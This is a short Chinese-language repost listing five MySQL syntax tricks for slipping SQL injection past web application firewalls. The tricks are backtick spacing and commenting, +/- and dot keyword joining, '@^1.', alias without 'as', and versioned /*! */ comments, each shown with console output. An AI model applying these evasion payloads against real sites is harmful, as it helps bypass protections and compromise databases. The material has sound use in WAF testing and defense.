WAF绕过的一些技巧
时间:2016-12-16 10:38 来源:转载 作者:匿名投稿 点击:次
tips1: 神奇的 ` (格式输出表的那个控制符) 过空格和一些正则。 mysql> select`version`() -> ; +———————-+ | `version`() +———————-+ | 5.1.50-community-log | +———————-+ 1 row in set (0.00 sec) 一个更好玩的技巧,这个`控制符可以当注释符用(限定条件)。 mysql> select id from qs_admins where id=1;`dfff and comment it; +—-+ | id | +—-+ | 1 | +—-+ 1 row in set (0.00 sec) usage : where id =’0’`’xxxxcomment on. tips2:神奇的- + . mysql> select id from qs_admins; +—-+ | id | +—-+ | 1 | +—-+ 1 row in set (0.00 sec) mysql> select+id-1+1.from qs_admins; +———-+ | +id-1+1. | +———-+ | 1 | +———-+ 1 row in set (0.00 sec) mysql> select-id-1+3.from qs_admins; +———-+
| -id-1+3. | +———-+ | 1 | +———-+ 1 row in set (0.00 sec) (有些人不是一直在说关键字怎么过?过滤一个 from …就是这样连起来过) tips3: @ mysql> select@^1.from qs_admins; +——|+ | @^1. | +——|+ | NULL | +——|+ 这个是 bypass曾经dedeCMS filter . 或者这样也是 ok. tips4:mysql function() as xxx 也可以不用 as 和空格 mysql> select-count(id)test from qs_admins; +——|+ | test | +——|+ | -1 | +——|+ 1 row in set (0.00 sec) tips5:/*![>5000]*/ 新构造版本号(这个可能有些过时了。) mysql> /\*!40000select\*/ id from qs_admins; +—-+ | id | +—-+ | 1 | +—-+ 1 row in set (0.00 sec) |